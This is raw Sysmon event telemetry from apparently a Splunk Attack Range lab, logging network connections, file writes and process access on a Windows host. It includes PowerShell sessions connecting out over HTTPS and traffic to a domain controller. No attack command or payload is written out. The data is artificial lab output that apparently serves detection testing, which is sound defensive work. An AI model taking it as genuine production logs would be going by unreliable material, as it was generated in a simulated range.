Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=60EC74D2A789A34724B15155A31AA487,SHA256=4D7F57E655947FB40E915718DF0ADFB7AAEF12AC077A1666D87EDBB12FE680D1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.519{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56815-false10.0.1.14WIN-DC-12849666- 354300x800000000000000035086225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.516{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56814-false10.0.1.14WIN-DC-128135epmap 354300x800000000000000035086224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.505{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56813-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035086223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.425{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56811-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.425{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56812-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.423{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56810-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.382{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56809-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035086219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.335{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56808-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035086218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:53.844{00000000-0000-0000-0000-000000000000}5504<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56807-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal8000- 23542300x800000000000000035086217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2D6425C18060048F2740B77111F3EAF7,SHA256=479E4D5D807937BFA8797309F337A1DB283AF5F9233F216F0C99B50F484BF924,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164114039F6AB4A643BE69479672B601,SHA256=BD72C8495438A2F63A7CD662B4DEFFD40439ACA532DF9AF372CA487F177BAD92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:29.130{B81B27B7-4FF4-613A-8390-03000000C801}57646548C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035086229Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.817{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56816-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 22542200x800000000000000035086228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:54.338{00000000-0000-0000-0000-000000000000}5504win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035086227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.009{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7D751B91AE2FEB448553E19A0F5BEA8,SHA256=0C366E3AFB0F8C1F2F8E4EBB44B5D2DD83C7AFC35D02AF67CFA2FB3A7BDBC539,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086230Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:31.073{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A25A4ECC80380D0CFE54BBC6B4E539,SHA256=476C8DDD917DB908A0A439BB4E714E8134EB090151694E614CD1BFF71FEA601F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086231Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:32.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F70AB1A63519E4B6D04B6AB60D604D66,SHA256=49A168280B6A854B28E86C704AD234D4D64C1EC229AB252B7B4C6D54B20B47D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086232Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:33.125{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A18A676D99E0CA01BA7C670098F2CBB4,SHA256=EF5148247D7DAA3B90DC1CA19998F6672CCAD50A93044B087FF807B038CA2EC3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:34.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D9279FD0D0FE1CC7284A0BB730FF60F,SHA256=BDBF4BF296B3F4F373B7F0DEC67216059FE749C413C992AC33AB422B911BEC45,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:34.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4F5552FBBAF79AC27F94B7839ED44C1,SHA256=9EFB5736412E6108CD22BB779C4B83551BFBF2987D304DBAD3B1FA6439FAE96C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086233Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:58.834{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56817-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:35.142{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9013A7AB60ADDCEA548A9CD942104D1,SHA256=4DD81BD3BFD9185D6ECAED4430AA8B5BBA94DFAB0F701893D50D45B074E7C88A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:59.081{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56818-false10.0.1.12-8000- 23542300x800000000000000035086239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:36.456{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=F2B12DE2A42C4065E70F963218EB7584,SHA256=8649B593126CD62ACF37EE3FF8291821327E6A52F9C4B55EF2A2FA68C2DDDB6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:36.172{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D592923FB6B6A805BF3B2059FEBD93AC,SHA256=68D633F519D8317D77AF176A319383C72A108B4033A2BFA2C0E970AFB369101D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:37.208{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0DE0392743BD5129097CC3A6E922B4A,SHA256=6B96AD9132A3F156FDAF8EB850543A1DFC9294B0D3F5BB2ECD5F7491895C4D8D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:38.987{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=DBB9141B36556423C53F6A9120BD24EF,SHA256=3833C6A446CDAA01E307CADEB30BF518675C53F3C107DCA6FD1E144891FCA4E3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:38.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B14D66D27E6D0E7D60B270EBD163C3A8,SHA256=5E4C25C40DD59031E97D8252E096CA6426D8016B47F1CC8ECD48F61AA3895729,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:39.240{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7F207C33D5047EC200C4959A9AD45CF,SHA256=9DADDB0560D4EFD20361E77291BF7C20F2E2E9117291ED39C23A9C816734BFE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:03.849{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56819-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:40.304{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BE84B48F79E47725BAF95F8D15EA180,SHA256=0FD3382E2ECA3F1E5DEF6FC7B5524CBC722F2FAC92EB6F2BFD9F8233FC8EDD14,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:19:04.126{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56820-false10.0.1.12-8000- 23542300x800000000000000035086247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:41.322{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70BF222610E26021479A01C15F1A3D84,SHA256=52BA2D1578FBFC1A5BA485D8DC80853F7244D3A34819763DBC2A85C7B12AE25F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:42.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED466458AA7D4315EFF4C69A2881ABE6,SHA256=AF460D138E45CFC34D897588D36AC7265AEBAEAC3A741A27F86B8818E731475C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.755{B81B27B7-5003-613A-8490-03000000C801}2996728C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.607{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5003-613A-8490-03000000C801}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.605{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.605{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.604{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.604{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.604{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-5003-613A-8490-03000000C801}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.604{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-5003-613A-8490-03000000C801}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.587{B81B27B7-5003-613A-8490-03000000C801}2996C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:43.340{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90120147C6D4C53F55259BF1AB607BB0,SHA256=1634367DFEC663C4BEA8BBEF0B7AA396DE87AECEB341F5E4B19532AD5FF43FC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DB5E53393571D0992DE66CCC1E80FD5B,SHA256=EBA714A1C053BFA0DACEF4B710674FE2DC78FE8A0DE3F7EBEAB477C863652AD0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=597D9CB0B49E7B2B714B5C48902EA392,SHA256=ED7F73DB6D8EEB9A342D778483D01278FF83E1EFDCD5A46BFF35A699E4B350E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.474{B81B27B7-5004-613A-8590-03000000C801}52563268C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035086267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.355{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7480520BB09EE7DFD1AA33FC3B85F7BA,SHA256=842939915C7ACE9F39D89C20BB3B78D83F58CA8BF6E6A97A44F294F279DBFF35,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:44.308{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-5004-613A-8590-03000000C801}5256C:\Program 